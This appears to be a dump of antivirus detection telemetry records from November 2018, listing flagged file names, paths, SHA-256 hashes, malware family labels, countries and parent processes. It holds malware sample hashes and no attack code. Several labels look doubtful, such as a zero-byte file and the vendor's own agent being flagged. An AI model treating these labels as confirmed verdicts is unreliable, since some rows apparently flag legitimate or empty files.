  Row(detection=Row(filename='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\15CDC877B347566B3E988688C259784EE564A86FFBC11098419B7A41E5C66654', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='15cdc877b347566b3e988688c259784ee564a86ffbc11098419b7a41e5c66654', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:23:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0127090.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127090.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:44:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-205640-cd55a285', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_77273961\\AVSCAN-20181101-205534-C42517FF\\AVSCAN-20181101-205640-CD55A285', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:56:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='user.exe16', filepath='J:\\PCem EMULATORi\\WineVDM\\otvdm-v0.5.0a\\dll\\user.exe16', filesize=384000, name='HEUR/APC.#M1.#R1'), hash='4ad1319a417734b89c64dfc07fa9087a256486fe7f4fe420da9b94d22ff14fe6', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='J:\\PCem EMULATORi\\WineVDM\\otvdm-v0.5.0a\\otvdmw.exe', parentsize=19968, timestamp='2018-11-01T15:02:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-190308-009e805e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c865e21b\\AVSCAN-20181101-190135-EC96216E\\AVSCAN-20181101-190308-009E805E', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T18:03:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylivehandler.exe', filepath='C:\\Program Files\\DealPlyLive\\Update\\1.3.23.0\\DealPlyLiveHandler.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maxpayne.exe', filepath='E:\\العاب\\العاب الوكيل\\4x4\\4\\New Briefcase\\Max Payne\\MaxPayne.exe', filesize=5120000, name='W32/Sality.AT.#M1.#R1'), hash='45919ef2bbec79687f66a6827276be60fdd4fb2cf45eb913f23209cfb256f9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T21:31:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.963\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EX00.963\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T17:05:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:42:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup.zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:52:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172555-82e9b8b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3edb3428\\AVSCAN-20181101-172521-7E2E1DB2\\AVSCAN-20181101-172555-82E9B8B0', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:25:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000042db', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000042db', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T15:38:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111552-2a4ba24b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9ae1d9bb\\AVSCAN-20181101-111531-26FF4912\\AVSCAN-20181101-111552-2A4BA24B', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:15:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195015-f1d6f5a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-194958-EE6059EA\\AVSCAN-20181101-195015-F1D6F5A9', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T19:34:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cygstart.exe', filepath='G:\\دورة صيانة 2017\\imie tool\\IMEI CHANGER\\Dragonface-V10\\CPFOP\\bin\\cygstart.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5c3038e14be02b033a1818b1aff607d683ed25a9224a0f407b6c0f12e1784de5', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\mshta.exe', parentsize=13312, timestamp='2018-11-01T13:00:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-193947-2a6c4b87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e5e66a11\\AVSCAN-20181101-193930-277D07A2\\AVSCAN-20181101-193947-2A6C4B87', filesize=512000, name='HEUR/AGEN.1008203.#M1.#R1'), hash='1f3f43c4cab219ebe87eb102bbbafb3ac44eeeef3abb2f867f01876fc3f6e37d', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:40:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150338-44d8cf8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db3cca74\\AVSCAN-20181101-143851-27C6350E\\AVSCAN-20181101-150338-44D8CF8C', filesize=18944000, name='TR/Taranis.2811.#M1.#R1'), hash='008a4daa92fa915c36a0a30458045ce91e440598b7b696bcf3e28b8032e8c4e4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='D:\\3 ث Project\\VBExpress\\autorun.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='655563500c615d82d018840a8dde7d0531fa60aa4b432bccd7347a75ee107301', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T03:02:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:26:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-180000-e58a988c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_57cbddd8\\AVSCAN-20181101-174945-9A9B0304\\AVSCAN-20181101-180000-E58A988C', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='SG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T05:58:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clif080r.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Intelligix\\Netix Retail\\Modules\\10.0.0.1\\CLIF080R.exe', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='ebad2f54327c1c1d9205662e7b124e7fbb35ff373721599d9882b8a45856c8a5', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:14:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vc_redist.x86.exe', filepath='C:\\ProgramData\\Package Cache\\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}\\VC_redist.x86.exe', filesize=580000, name='W32/Jeefo.A.#M1.#R1'), hash='a0d3d94a34a990441a66d26bdce8c3489703308a43461a7eebd42ba90b3956cd', metadata=Row(cmdline='--engine=2 --session-id=8YsoEh9XPV4LLlyuyfzuOr+VsXK2bOIfuptUHBMo --registry-suffix=ESET --enable-crash-reporting --srt-field-trial-group-name=NewCleanerUIExperiment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=13449336, timestamp='2018-11-01T19:09:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='972b7fe8212580b5cc73ba32dba3da6756e883961eaf11b14f3efba84e257d59.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-14.available\\Avira\\972B7FE8212580B5CC73BA32DBA3DA6756E883961EAF11B14F3EFBA84E257D59.VIR', filesize=680000, name='TR/Dropper.Gen.#M300.#R246'), hash='972b7fe8212580b5cc73ba32dba3da6756e883961eaf11b14f3efba84e257d59', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T08:19:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\s14byb0yi02\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='2 3.1540912029.5bd8739d3b7a5', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Emtak\\214531731.exe', parentsize=670720, timestamp='2018-11-01T10:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212948-2232acc6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212948-2232ACC6', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:30:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095202-55e5d604', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095202-55E5D604', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:52:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094035-d22a01c3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094035-D22A01C3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:40:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='panorama.dll', filepath='E:\\Dota2\\bin\\panorama\\panorama.dll', filesize=5044000, name='TR/Crypt.XPACK.Gen3.#M300.#R200156'), hash='cf34a4e00d1ad223048cdc3a187dfcd018899f96c9b229f956b100844381e05e', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:40:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094839-ab84b4c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-094836-AAD64268\\AVSCAN-20181101-094839-AB84B4C6', filesize=2216000, name='PUA/Softcnapp.#M1.#R1'), hash='d459c3ef5011147cda165096d073d3ff14cb504ed1abc1f88638508c4705b41c', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:51:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-211555-9c05d275', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ccb5e6d0\\AVSCAN-20181101-210147-2591929C\\AVSCAN-20181101-211555-9C05D275', filesize=3904000, name='TR/Dldr.Agent.qmgbi.#M1.#R1'), hash='b90be0161709682d885171d6589758b4ed7306ecafa6694505d9cb735096c217', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:15:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tintolavanderia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\TINTOLAVANDERIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ddebff830d94beef8d9a87f918c8efdb4f70e4d62e572ea57886c30b889e77ae', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-16\\DDEBFF830D94BEEF8D9A87F918C8EFDB4F70E4D62E572EA57886C30B889E77AE', filesize=104000, name='HEUR/AGEN.1032151.#M1.#R1'), hash='ddebff830d94beef8d9a87f918c8efdb4f70e4d62e572ea57886c30b889e77ae', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-16.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 30.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\archive.zip\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T05:49:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-081734-4dc4f386', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-081640-431A7124\\AVSCAN-20181101-081734-4DC4F386', filesize=320000, name='TR/Black.Gen2.#M1.#R1'), hash='a6e72df8ccc11a35e64106d808aad51944b2c3ca470a8d6034e0437702dcb7d6', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T00:17:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194455-3ddae94d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194455-3DDAE94D', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:44:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tahgscek.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\tahGSceK.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered nidos', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nidos', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='ec8f0a724c5f13b2d505f03ec1b14560c8ccbf66502538b193f5c9a1896b3232', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T10:06:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xoqijdgi.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\XOQIjDgI.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C364B5F31A3373443BD737ABB4764E6C7955A749855A497937A97C9E5F49D65E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c364b5f31a3373443bd737abb4764e6c7955a749855a497937a97c9e5f49d65e', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:08:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\qtrdsbwlnsy\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:40:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='r latter head.exe', filepath='G:\\\xa0\\R LATTER HEAD\\R LATTER HEAD.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:22:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T11:10:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130702-0420d59e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-130702-0420D59E', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:07:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-04T17:08:44Z'), dt=datetime.date(2018, 11, 4)),
